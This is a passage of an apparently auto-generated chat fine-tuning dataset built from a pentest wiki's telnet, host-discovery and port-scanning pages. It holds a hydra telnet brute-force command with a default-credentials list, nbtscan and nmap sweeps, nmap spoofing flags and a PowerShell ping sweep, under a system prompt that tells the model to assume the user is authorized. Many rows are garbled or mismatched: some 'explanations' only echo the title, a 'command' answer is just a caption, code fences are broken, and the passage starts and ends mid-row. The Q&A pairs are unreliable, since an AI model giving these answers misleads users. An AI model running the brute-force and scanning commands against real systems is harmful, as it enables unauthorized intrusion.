root -P $PATH_TO/seclists/Passwords/Default-Credentials/telnet-betterdefaultpasslist.txt $TARGET_IP telnet", "metadata": {"corpus_index": 1556, "category": "linux", "source_file": "docs/src/infra/protocols/telnet.md", "page_title": "🛠️ Telnet", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `hydra [-L users.txt or -l user_name] [-P pass.txt or -p password] -f [-S $TARGET_PORT] telnet://$TARGET_IP`?"}, {"role": "assistant", "content": "This command is used for 🛠️ telnet - brute force. Brute Force"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `hydra [-L users.txt or -l user_name] [-P pass.txt or -p password] -f [-S $TARGET_PORT] telnet://$TARGET_IP`?", "response": "This command is used for 🛠️ telnet - brute force. Brute Force", "metadata": {"corpus_index": 1556, "category": "linux", "source_file": "docs/src/infra/protocols/telnet.md", "page_title": "🛠️ Telnet", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about 🛠️ Hosts discovery - Theory?"}, {"role": "assistant", "content": "When targeting machines connected to a network, identifying which hosts are up and running (and their IP address) is the first step in getting to know the attack surface. There are multiple active and passive ways to discover hosts in a network, each relying on specific protocols that may be used in the network.\n\nOnce the hosts are identified, attackers then usually proceed to port scanning to attempt at compromising them.\n\nAlternatively, there are common scenarios where most of the hosts and services are managed by a central set of services like Active Directory Domain Services (AD-DS). In this case, attackers usually try to compromise those services first as it would grant them control over many hosts without having to attack them all. A whole category of The Hacker Recipes is dedicated to Active Directory Domain Services (and other associated AD services)."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about 🛠️ Hosts discovery - Theory?", "response": "When targeting machines connected to a network, identifying which hosts are up and running (and their IP address) is the first step in getting to know the attack surface. There are multiple active and passive ways to discover hosts in a network, each relying on specific protocols that may be used in the network.\n\nOnce the hosts are identified, attackers then usually proceed to port scanning to attempt at compromising them.\n\nAlternatively, there are common scenarios where most of the hosts and services are managed by a central set of services like Active Directory Domain Services (AD-DS). In this case, attackers usually try to compromise those services first as it would grant them control over many hosts without having to attack them all. A whole category of The Hacker Recipes is dedicated to Active Directory Domain Services (and other associated AD services).", "metadata": {"corpus_index": 1557, "category": "network", "source_file": "docs/src/infra/recon/hosts-discovery.md", "page_title": "🛠️ Hosts discovery", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do 🛠️ Hosts discovery - Theory"}, {"role": "assistant", "content": "When targeting machines connected to a network, identifying which hosts are up and running (and their IP address) is the first step in getting to know the attack surface. There are multiple active and passive ways to discover hosts in a network, each relying on specific protocols that may be used in the network.\n\nOnce the hosts are identified, attackers then usually proceed to port scanning to attempt at compromising them.\n\nAlternatively, there are common scenarios where most of the hosts and services are managed by a central set of services like Active Directory Domain Services (AD-DS). In this case, attackers usually try to compromise those services first as it would grant them control over many hosts without having to attack them all. A whole category of The Hacker Recipes is dedicated to Active Directory Domain Services (and other associated AD services)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do 🛠️ Hosts discovery - Theory", "response": "When targeting machines connected to a network, identifying which hosts are up and running (and their IP address) is the first step in getting to know the attack surface. There are multiple active and passive ways to discover hosts in a network, each relying on specific protocols that may be used in the network.\n\nOnce the hosts are identified, attackers then usually proceed to port scanning to attempt at compromising them.\n\nAlternatively, there are common scenarios where most of the hosts and services are managed by a central set of services like Active Directory Domain Services (AD-DS). In this case, attackers usually try to compromise those services first as it would grant them control over many hosts without having to attack them all. A whole category of The Hacker Recipes is dedicated to Active Directory Domain Services (and other associated AD services).", "metadata": {"corpus_index": 1557, "category": "network", "source_file": "docs/src/infra/recon/hosts-discovery.md", "page_title": "🛠️ Hosts discovery", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe 🛠️ Hosts discovery - NBT discovery in the context of penetration testing"}, {"role": "assistant", "content": "It sends NetBIOS status query to each address in supplied range and lists received information in human readable form. For each responded host it lists IP address, NetBIOS computer name, logged-in user name and MAC address (such as Ethernet).\n\n``bash\nnbtscan -r $RANGE\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe 🛠️ Hosts discovery - NBT discovery in the context of penetration testing", "response": "It sends NetBIOS status query to each address in supplied range and lists received information in human readable form. For each responded host it lists IP address, NetBIOS computer name, logged-in user name and MAC address (such as Ethernet).\n\n``bash\nnbtscan -r $RANGE\n``", "metadata": {"corpus_index": 1558, "category": "network", "source_file": "docs/src/infra/recon/hosts-discovery.md", "page_title": "🛠️ Hosts discovery", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for 🛠️ Hosts discovery - NBT discovery"}, {"role": "assistant", "content": "It sends NetBIOS status query to each address in supplied range and lists received information in human readable form. For each responded host it lists IP address, NetBIOS computer name, logged-in user name and MAC address (such as Ethernet).\n\n``bash\nnbtscan -r $RANGE\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for 🛠️ Hosts discovery - NBT discovery", "response": "It sends NetBIOS status query to each address in supplied range and lists received information in human readable form. For each responded host it lists IP address, NetBIOS computer name, logged-in user name and MAC address (such as Ethernet).\n\n``bash\nnbtscan -r $RANGE\n``", "metadata": {"corpus_index": 1558, "category": "network", "source_file": "docs/src/infra/recon/hosts-discovery.md", "page_title": "🛠️ Hosts discovery", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the nbtscan command to 🛠️ hosts discovery - nbt discovery"}, {"role": "assistant", "content": "nbtscan -r $RANGE"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the nbtscan command to 🛠️ hosts discovery - nbt discovery", "response": "nbtscan -r $RANGE", "metadata": {"corpus_index": 1559, "category": "network", "source_file": "docs/src/infra/recon/hosts-discovery.md", "page_title": "🛠️ Hosts discovery", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "nbtscan"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out 🛠️ Hosts discovery - NBT discovery during a pentest?"}, {"role": "assistant", "content": "nbtscan -r $RANGE"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out 🛠️ Hosts discovery - NBT discovery during a pentest?", "response": "nbtscan -r $RANGE", "metadata": {"corpus_index": 1559, "category": "network", "source_file": "docs/src/infra/recon/hosts-discovery.md", "page_title": "🛠️ Hosts discovery", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `nbtscan -r $RANGE`?"}, {"role": "assistant", "content": "This command is used for 🛠️ hosts discovery - nbt discovery. NBT discovery"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `nbtscan -r $RANGE`?", "response": "This command is used for 🛠️ hosts discovery - nbt discovery. NBT discovery", "metadata": {"corpus_index": 1559, "category": "network", "source_file": "docs/src/infra/recon/hosts-discovery.md", "page_title": "🛠️ Hosts discovery", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does 🛠️ Hosts discovery - DNS queries work?"}, {"role": "assistant", "content": "In Active Directory environnements, machines have their record on the Domain Controller (which usually hosts the DNS service). Through PTR resolution requests, is it then possible to find additional ranges and machines.\n\n> [!TIP]\n> Read the dns.md article for more insight"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does 🛠️ Hosts discovery - DNS queries work?", "response": "In Active Directory environnements, machines have their record on the Domain Controller (which usually hosts the DNS service). Through PTR resolution requests, is it then possible to find additional ranges and machines.\n\n> [!TIP]\n> Read the dns.md article for more insight", "metadata": {"corpus_index": 1560, "category": "network", "source_file": "docs/src/infra/recon/hosts-discovery.md", "page_title": "🛠️ Hosts discovery", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform 🛠️ Hosts discovery - DNS queries?"}, {"role": "assistant", "content": "In Active Directory environnements, machines have their record on the Domain Controller (which usually hosts the DNS service). Through PTR resolution requests, is it then possible to find additional ranges and machines.\n\n> [!TIP]\n> Read the dns.md article for more insight"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform 🛠️ Hosts discovery - DNS queries?", "response": "In Active Directory environnements, machines have their record on the Domain Controller (which usually hosts the DNS service). Through PTR resolution requests, is it then possible to find additional ranges and machines.\n\n> [!TIP]\n> Read the dns.md article for more insight", "metadata": {"corpus_index": 1560, "category": "network", "source_file": "docs/src/infra/recon/hosts-discovery.md", "page_title": "🛠️ Hosts discovery", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Send ICMP echo, timestamp, and netmask request discovery probes to a range"}, {"role": "assistant", "content": "nmap -PE -PP -PM -sP $RANGE\n``\n\nPing Sweep on Powershell:\n\n`powershell\n$ping = New-Object System.Net.Networkinformation.Ping ; 1..254 | % { $ping.send(\"192.168.0.$_\", 1) | where status -ne 'TimedOut' | select Address | fl * }\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Send ICMP echo, timestamp, and netmask request discovery probes to a range", "response": "nmap -PE -PP -PM -sP $RANGE\n``\n\nPing Sweep on Powershell:\n\n`powershell\n$ping = New-Object System.Net.Networkinformation.Ping ; 1..254 | % { $ping.send(\"192.168.0.$_\", 1) | where status -ne 'TimedOut' | select Address | fl * }\n``", "metadata": {"corpus_index": 1561, "category": "network", "source_file": "docs/src/infra/recon/hosts-discovery.md", "page_title": "🛠️ Hosts discovery", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Send ICMP echo, timestamp, and netmask request discovery probes to a range"}, {"role": "assistant", "content": "nmap -PE -PP -PM -sP $RANGE\n``\n\nPing Sweep on Powershell:\n\n`powershell\n$ping = New-Object System.Net.Networkinformation.Ping ; 1..254 | % { $ping.send(\"192.168.0.$_\", 1) | where status -ne 'TimedOut' | select Address | fl * }\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Send ICMP echo, timestamp, and netmask request discovery probes to a range", "response": "nmap -PE -PP -PM -sP $RANGE\n``\n\nPing Sweep on Powershell:\n\n`powershell\n$ping = New-Object System.Net.Networkinformation.Ping ; 1..254 | % { $ping.send(\"192.168.0.$_\", 1) | where status -ne 'TimedOut' | select Address | fl * }\n``", "metadata": {"corpus_index": 1561, "category": "network", "source_file": "docs/src/infra/recon/hosts-discovery.md", "page_title": "🛠️ Hosts discovery", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the Ping command to send icmp echo, timestamp, and netmask request discovery probes to a range"}, {"role": "assistant", "content": "Ping Sweep on Powershell:"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the Ping command to send icmp echo, timestamp, and netmask request discovery probes to a range", "response": "Ping Sweep on Powershell:", "metadata": {"corpus_index": 1562, "category": "network", "source_file": "docs/src/infra/recon/hosts-discovery.md", "page_title": "🛠️ Hosts discovery", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Ping"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Send ICMP echo, timestamp, and netmask request discovery probes to a range"}, {"role": "assistant", "content": "Ping Sweep on Powershell:"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Send ICMP echo, timestamp, and netmask request discovery probes to a range", "response": "Ping Sweep on Powershell:", "metadata": {"corpus_index": 1562, "category": "network", "source_file": "docs/src/infra/recon/hosts-discovery.md", "page_title": "🛠️ Hosts discovery", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Ping Sweep on Powershell:`?"}, {"role": "assistant", "content": "This command is used for send icmp echo, timestamp, and netmask request discovery probes to a range. Send ICMP echo, timestamp, and netmask request discovery probes to a range"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Ping Sweep on Powershell:`?", "response": "This command is used for send icmp echo, timestamp, and netmask request discovery probes to a range. Send ICMP echo, timestamp, and netmask request discovery probes to a range", "metadata": {"corpus_index": 1562, "category": "network", "source_file": "docs/src/infra/recon/hosts-discovery.md", "page_title": "🛠️ Hosts discovery", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Port scanning - Theory"}, {"role": "assistant", "content": "When targeting machines connected to a network, identifying which services are running and accessible remotely allows attackers to have a better understanding of the attack surface.\n\nServices open to the network usually rely on one of two transport protocols: TCP or UDP.\n\n* TCP (Transmission Control Protocol): requires a 3-way handshake to establish a connection. TCP is the most reliable transport protocol of the two as it allows re-transmission of lost data packets.\n* UDP (User Datagram Protocol): doesn't require any connection at all. Packets can be sent freely but may not arrive. UDP is faster, simpler, but less reliable. It's mostly used for streaming purposes and for services that have a high speed requirement.\n\nTCP and UDP are quite similar in the sense that they work with ports. Services can be bound to ports and users go through these ports to access the services.\n\n> [!TIP]\n> ICMP (Internet Control Message Protocol) is a separate transport protocol that is commonly known for its \"echo request\" message used to \"ping\" machines across networks. ICMP doesn't rely on ports like TCP and UDP do. There is no port in ICMP.\n\nWhile there are many services that are well known for using common ports (e.g. 80/TCP for HTTP, 443/TCP for HTTPS, 22/TCP for SSH, etc.), the port is just a number. Any port from 0 to 65535 can be bound to any service. Machines (a.k.a. hosts) can theoretically have 65536 ports open on TCP, and 65536 ports open on UDP at the same time.\n\nKnowing which ports are open on a host, and which services hide between these ports is essential in the host reconnaissance part of an intrusion attempt."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Port scanning - Theory", "response": "When targeting machines connected to a network, identifying which services are running and accessible remotely allows attackers to have a better understanding of the attack surface.\n\nServices open to the network usually rely on one of two transport protocols: TCP or UDP.\n\n* TCP (Transmission Control Protocol): requires a 3-way handshake to establish a connection. TCP is the most reliable transport protocol of the two as it allows re-transmission of lost data packets.\n* UDP (User Datagram Protocol): doesn't require any connection at all. Packets can be sent freely but may not arrive. UDP is faster, simpler, but less reliable. It's mostly used for streaming purposes and for services that have a high speed requirement.\n\nTCP and UDP are quite similar in the sense that they work with ports. Services can be bound to ports and users go through these ports to access the services.\n\n> [!TIP]\n> ICMP (Internet Control Message Protocol) is a separate transport protocol that is commonly known for its \"echo request\" message used to \"ping\" machines across networks. ICMP doesn't rely on ports like TCP and UDP do. There is no port in ICMP.\n\nWhile there are many services that are well known for using common ports (e.g. 80/TCP for HTTP, 443/TCP for HTTPS, 22/TCP for SSH, etc.), the port is just a number. Any port from 0 to 65535 can be bound to any service. Machines (a.k.a. hosts) can theoretically have 65536 ports open on TCP, and 65536 ports open on UDP at the same time.\n\nKnowing which ports are open on a host, and which services hide between these ports is essential in the host reconnaissance part of an intrusion attempt.", "metadata": {"corpus_index": 1563, "category": "network", "source_file": "docs/src/infra/recon/port-scanning.md", "page_title": "Port scanning", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Port scanning - Theory"}, {"role": "assistant", "content": "When targeting machines connected to a network, identifying which services are running and accessible remotely allows attackers to have a better understanding of the attack surface.\n\nServices open to the network usually rely on one of two transport protocols: TCP or UDP.\n\n* TCP (Transmission Control Protocol): requires a 3-way handshake to establish a connection. TCP is the most reliable transport protocol of the two as it allows re-transmission of lost data packets.\n* UDP (User Datagram Protocol): doesn't require any connection at all. Packets can be sent freely but may not arrive. UDP is faster, simpler, but less reliable. It's mostly used for streaming purposes and for services that have a high speed requirement.\n\nTCP and UDP are quite similar in the sense that they work with ports. Services can be bound to ports and users go through these ports to access the services.\n\n> [!TIP]\n> ICMP (Internet Control Message Protocol) is a separate transport protocol that is commonly known for its \"echo request\" message used to \"ping\" machines across networks. ICMP doesn't rely on ports like TCP and UDP do. There is no port in ICMP.\n\nWhile there are many services that are well known for using common ports (e.g. 80/TCP for HTTP, 443/TCP for HTTPS, 22/TCP for SSH, etc.), the port is just a number. Any port from 0 to 65535 can be bound to any service. Machines (a.k.a. hosts) can theoretically have 65536 ports open on TCP, and 65536 ports open on UDP at the same time.\n\nKnowing which ports are open on a host, and which services hide between these ports is essential in the host reconnaissance part of an intrusion attempt."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Port scanning - Theory", "response": "When targeting machines connected to a network, identifying which services are running and accessible remotely allows attackers to have a better understanding of the attack surface.\n\nServices open to the network usually rely on one of two transport protocols: TCP or UDP.\n\n* TCP (Transmission Control Protocol): requires a 3-way handshake to establish a connection. TCP is the most reliable transport protocol of the two as it allows re-transmission of lost data packets.\n* UDP (User Datagram Protocol): doesn't require any connection at all. Packets can be sent freely but may not arrive. UDP is faster, simpler, but less reliable. It's mostly used for streaming purposes and for services that have a high speed requirement.\n\nTCP and UDP are quite similar in the sense that they work with ports. Services can be bound to ports and users go through these ports to access the services.\n\n> [!TIP]\n> ICMP (Internet Control Message Protocol) is a separate transport protocol that is commonly known for its \"echo request\" message used to \"ping\" machines across networks. ICMP doesn't rely on ports like TCP and UDP do. There is no port in ICMP.\n\nWhile there are many services that are well known for using common ports (e.g. 80/TCP for HTTP, 443/TCP for HTTPS, 22/TCP for SSH, etc.), the port is just a number. Any port from 0 to 65535 can be bound to any service. Machines (a.k.a. hosts) can theoretically have 65536 ports open on TCP, and 65536 ports open on UDP at the same time.\n\nKnowing which ports are open on a host, and which services hide between these ports is essential in the host reconnaissance part of an intrusion attempt.", "metadata": {"corpus_index": 1563, "category": "network", "source_file": "docs/src/infra/recon/port-scanning.md", "page_title": "Port scanning", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Port scanning - Practice"}, {"role": "assistant", "content": "The most commonly used tool for port scanning is nmap (\"Network Mapper\"). This tool features a lot of options but the main ones are the following.\n\n``\nSCAN TECHNIQUES\n -sS/sT/sA: TCP SYN/Connect()/ACK scans\n -sU: UDP Scan\n\nPORT SPECIFICATION AND SCAN ORDER\n -p : Only scan specified ports\n Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080\n -F: Fast mode - Scan 100 most common\n --top-ports : Scan most common ports\n \nTIMING AND PERFORMANCE\n -T<0-5>: Set timing template (higher is faster)\n Templates (0-5): paranoid|sneaky|polite|normal|aggressive|insane \n\nSERVICE/VERSION DETECTION\n -sV: Probe open ports to determine service/version info\n \nSCRIPT SCAN\n -sC: equivalent to --script=default\n\nHOST DISCOVERY\n -Pn: Treat all hosts as online -- skip host discovery\n\nFIREWALL/IDS EVASION AND SPOOFING\n -f; --mtu : fragment packets (optionally w/given MTU)\n -S : Spoof source address\n -e : Use specified interface\n\nOUTPUT\n -oN/-oX/-oS/-oG : Output scan in normal, XML, s|: Output in the three major formats at once\n -v: Increase verbosity level (use -vv or more for greater effect)\n`\n\nThe following nmap commands are the most commonly used.\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Port scanning - Practice", "response": "The most commonly used tool for port scanning is nmap (\"Network Mapper\"). This tool features a lot of options but the main ones are the following.\n\n``\nSCAN TECHNIQUES\n -sS/sT/sA: TCP SYN/Connect()/ACK scans\n -sU: UDP Scan\n\nPORT SPECIFICATION AND SCAN ORDER\n -p : Only scan specified ports\n Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080\n -F: Fast mode - Scan 100 most common\n --top-ports : Scan most common ports\n \nTIMING AND PERFORMANCE\n -T<0-5>: Set timing template (higher is faster)\n Templates (0-5): paranoid|sneaky|polite|normal|aggressive|insane \n\nSERVICE/VERSION DETECTION\n -sV: Probe open ports to determine service/version info\n \nSCRIPT SCAN\n -sC: equivalent to --script=default\n\nHOST DISCOVERY\n -Pn: Treat all hosts as online -- skip host discovery\n\nFIREWALL/IDS EVASION AND SPOOFING\n -f; --mtu : fragment packets (optionally w/given MTU)\n -S : Spoof source address\n -e : Use specified interface\n\nOUTPUT\n -oN/-oX/-oS/-oG : Output scan in normal, XML, s|: Output in the three major formats at once\n -v: Increase verbosity level (use -vv or more for greater effect)\n`\n\nThe following nmap commands are the most commonly used.\n\n``bash", "metadata": {"corpus_index": 1564, "category": "network", "source_file": "docs/src/infra/recon/port-scanning.md", "page_title": "Port scanning", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Port scanning - Practice"}, {"role": "assistant", "content": "The most commonly used tool for port scanning is nmap (\"Network Mapper\"). This tool features a lot of options but the main ones are the following.\n\n``\nSCAN TECHNIQUES\n -sS/sT/sA: TCP SYN/Connect()/ACK scans\n -sU: UDP Scan\n\nPORT SPECIFICATION AND SCAN ORDER\n -p : Only scan specified ports\n Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080\n -F: Fast mode - Scan 100 most common\n --top-ports : Scan most common ports\n \nTIMING AND PERFORMANCE\n -T<0-5>: Set timing template (higher is faster)\n Templates (0-5): paranoid|sneaky|polite|normal|aggressive|insane \n\nSERVICE/VERSION DETECTION\n -sV: Probe open ports to determine service/version info\n \nSCRIPT SCAN\n -sC: equivalent to --script=default\n\nHOST DISCOVERY\n -Pn: Treat all hosts as online -- skip host discovery\n\nFIREWALL/IDS EVASION AND SPOOFING\n -f; --mtu : fragment packets (optionally w/given MTU)\n -S : Spoof source address\n -e : Use specified interface\n\nOUTPUT\n -oN/-oX/-oS/-oG : Output scan in normal, XML, s|: Output in the three major formats at once\n -v: Increase verbosity level (use -vv or more for greater effect)\n`\n\nThe following nmap commands are the most commonly used.\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Port scanning - Practice", "response": "The most commonly used tool for port scanning is nmap (\"Network Mapper\"). This tool features a lot of options but the main ones are the following.\n\n``\nSCAN TECHNIQUES\n -sS/sT/sA: TCP SYN/Connect()/ACK scans\n -sU: UDP Scan\n\nPORT SPECIFICATION AND SCAN ORDER\n -p : Only scan specified ports\n Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080\n -F: Fast mode - Scan 100 most common\n --top-ports : Scan most common ports\n \nTIMING AND PERFORMANCE\n -T<0-5>: Set timing template (higher is faster)\n Templates (0-5): paranoid|sneaky|polite|normal|aggressive|insane \n\nSERVICE/VERSION DETECTION\n -sV: Probe open ports to determine service/version info\n \nSCRIPT SCAN\n -sC: equivalent to --script=default\n\nHOST DISCOVERY\n -Pn: Treat all hosts as online -- skip host discovery\n\nFIREWALL/IDS EVASION AND SPOOFING\n -f; --mtu : fragment packets (optionally w/given MTU)\n -S : Spoof source address\n -e : Use specified interface\n\nOUTPUT\n -oN/-oX/-oS/-oG : Output scan in normal, XML, s|: Output in the three major formats at once\n -v: Increase verbosity level (use -vv or more for greater effect)\n`\n\nThe following nmap commands are the most commonly used.\n\n``bash", "metadata": {"corpus_index": 1564, "category": "network", "source_file": "docs/src/infra/recon/port-scanning.md", "page_title": "Port scanning", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the SCAN command for port scanning - practice"}, {"role": "assistant", "content": "SCAN TECHNIQUES\n -sS/sT/sA: TCP SYN/Connect()/ACK scans\n -sU: UDP Scan\n\nPORT SPECIFICATION AND SCAN ORDER\n -p : Only scan specified ports\n Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080\n -F: Fast mode - Scan 100 most common\n --top-ports : Scan most common ports\n \nTIMING AND PERFORMANCE\n -T<0-5>: Set timing template (higher is faster)\n Templates (0-5): paranoid|sneaky|polite|normal|aggressive|insane \n\nSERVICE/VERSION DETECTION\n -sV: Probe open ports to determine service/version info\n \nSCRIPT SCAN\n -sC: equivalent to --script=default\n\nHOST DISCOVERY\n -Pn: Treat all hosts as online -- skip host discovery\n\nFIREWALL/IDS EVASION AND SPOOFING\n -f; --mtu : fragment packets (optionally w/given MTU)\n -S : Spoof source address\n -e : Use specified interface\n\nOUTPUT\n -oN/-oX/-oS/-oG : Output scan in normal, XML, s|: Output in the three major formats at once\n -v: Increase verbosity level (use -vv or more for greater effect)"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the SCAN command for port scanning - practice", "response": "SCAN TECHNIQUES\n -sS/sT/sA: TCP SYN/Connect()/ACK scans\n -sU: UDP Scan\n\nPORT SPECIFICATION AND SCAN ORDER\n -p : Only scan specified ports\n Ex: -p22; -p1-65535; -p 